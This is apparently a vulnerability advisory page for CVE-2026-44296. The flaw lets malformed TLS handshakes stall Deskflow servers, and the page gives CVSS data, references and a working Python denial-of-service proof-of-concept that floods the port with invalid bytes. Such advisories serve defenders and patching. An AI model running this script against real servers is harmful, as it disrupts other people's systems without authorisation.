Security Vulnerability Report
CVE-2026-44296 CVSS 7.5 HIGH


Published: 2026-05-12 22:16:37
Last Modified: 2026-05-12 22:16:37

Description

Deskflow is a keyboard and mouse sharing app. Prior to 1.26.0.167, a remote, unauthenticated denial of service (DoS) vulnerability affects Deskflow servers running with TLS enabled (the default). When any TCP peer connects to the listening port and its first bytes do not parse as a valid TLS ClientHello, SecureSocket::secureAccept enters its fatal-error branch and calls Arch::sleep(1) (a blocking 1-second sleep) on the multiplexer worker thread. That thread services every socket on the server, including established TLS clients delivering mouse motion, keyboard events, and clipboard updates. A single failed handshake therefore stalls input delivery to all connected screens for ~1 second, and a sustained drip of malformed connections (≥ 1/s) makes the server effectively unusable while the attack persists. This vulnerability is fixed in 1.26.0.167.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data is available for this record; the affected version range below is taken from the description.

Deskflow < 1.26.0.167 (fixed in 1.26.0.167)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import time


def dos_attack(target_ip, target_port, duration):
    """
    PoC for CVE-2026-44296
    Sends non-TLS bytes to trigger the blocking sleep in Deskflow.
    """
    end_time = time.time() + duration
    print(f"[*] Starting DoS attack on {target_ip}:{target_port} for {duration} seconds...")
    while time.time() < end_time:
        try:
            # Create a TCP socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            # Connect to the Deskflow server
            s.connect((target_ip, target_port))
            # Send invalid bytes (not a valid TLS ClientHello)
            # This triggers the fatal error branch in SecureSocket::secureAccept
            s.send(b"INVALID_TLS_DATA")
            # Close the connection immediately
            s.close()
            # Sleep slightly to align with the 1-second block or sustain the attack
            time.sleep(0.1)
        except Exception as e:
            print(f"[!] Error: {e}")
            time.sleep(0.1)
    print("[*] Attack finished.")


if __name__ == "__main__":
    # Example usage
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 24800
    DURATION = 60
    dos_attack(TARGET_IP, TARGET_PORT, DURATION)
```

References

Commit: https://github.com/deskflow/deskflow/commit/329783490bd16774ba903b84212467d20d76bfba
GitHub Security Advisory: https://github.com/deskflow/deskflow/security/advisories/GHSA-3mxm-cgh2-6448

Weaknesses

CWE-400: Uncontrolled Resource Consumption
CWE-405: Asymmetric Resource Consumption (Amplification)

Additional Record Data

Record status: Received
CVSS v3.1 exploitability sub-score: 3.9
CVSS v3.1 impact sub-score: 3.6